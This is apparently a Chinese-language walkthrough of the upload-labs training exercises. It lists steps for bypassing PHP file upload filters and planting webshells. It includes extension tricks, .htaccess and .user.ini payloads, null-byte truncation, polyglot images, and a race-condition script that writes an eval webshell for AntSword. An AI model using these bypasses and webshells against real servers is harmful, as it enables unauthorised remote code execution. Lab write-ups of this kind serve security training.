Pass-01
步骤一:将一个php文件重命名为jpg文件
步骤二:上传1.jpg抓包,将后改为php,放行
步骤三:图片右键新建标签页打开图片,复制图片地址去蚁剑连接
Pass-02
步骤一:上传1.jpg抓包,将后改为php,放行
步骤二:图片右键新建标签页打开图片,复制图片地址去蚁剑连接
Pass-03
步骤一:php文件重命名为1.php5
步骤二:上传1.php5文件,图片右键新建标签页打开图片,复制图片地址去蚁剑连接
Pass-04
步骤一:创建一个.htaccess文件,里面输入内容<FilesMatch "1.jpg">
SetHandler application/x-httpd-php</FilesMatch>
步骤二:先上传.htaccess文件,再上传1.jpg,图片右键新建标签页打开图片
Pass-05
步骤一:创建一个.user.ini文件,输入内容auto_prepend_file = "1.jpg"
步骤二:先上传.user,ini文件,再上传1.jpg,访问http://127.0.0.1/upload/upload/readme.php
Pass-06
步骤一:上传1.php抓包,将1.php改为1.phP,放行
步骤二:图片右键新建标签页打开图片
Pass-07
步骤一:上传1.php抓包,将1.php后面加空格,放行
步骤二:图片右键新建标签页打开图片
Pass-08
步骤一:上传1.php抓包,将1.php后面加.,放行
步骤二:图片右键新建标签页打开图片
Pass-09
步骤一:上传1.php抓包,将1.php后面加::$DATA,放行
步骤二:图片右键新建标签页打开图片
Pass-10
步骤一:上传1.php文件抓包,1.php后面加.空格. 放行
步骤二:图片右键新建标签页打开图片
Pass-11
步骤一:将1.php改为1.pphphp
步骤二:上传1.pphphp文件,图片右键新建标签页打开图片
Pass-12
步骤一:上传1.php文件抓包,将/upload/后面添加随便一个php文件%00,1.php改为1.jpg 放行
步骤二:图片右键新建标签页打开图片,删掉�/9320240830163621.jpg访问
Pass-13
步骤一:上传1.php文件抓包,将/upload/后面添加随便一个php文件加空格,1.php改为1.jpg
步骤二:打开Hex,将6.php后面的空格对应的20改为00,放行
步骤三:图片右键新建标签页打开图片,删掉�/5320240830164829.jpg访问
Pass-14
步骤一:将一张图片和一个php文件放在cmd根目录,运行copy a.jpg/b+1.php/a shell.jpg
步骤二:上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址
Pass-15
步骤一:上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址
Pass-16
环境不支持
Pass-17
步骤一:图片需要二次渲染,上传图片,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址
步骤二:复制地址去蚁剑连接
Pass-18
步骤一:php文件输入<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>
步骤一:上传文件,burp抓包,发送到 intruder 模块,设置⽆限发送空的payloads,无限重复;
步骤二:访问1.php抓包,发送到 intruder 模块,设置⽆限发送空的payloads,无限重复;
步骤三:同时攻击,直到出现webshell.php
步骤四:访问webshell.php,使用蚁剑连接
Pass-20
步骤一:上传php文件,保存名称改为1.php/.
步骤二:图片右键新建标签页打开图片
扫一扫
3180
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
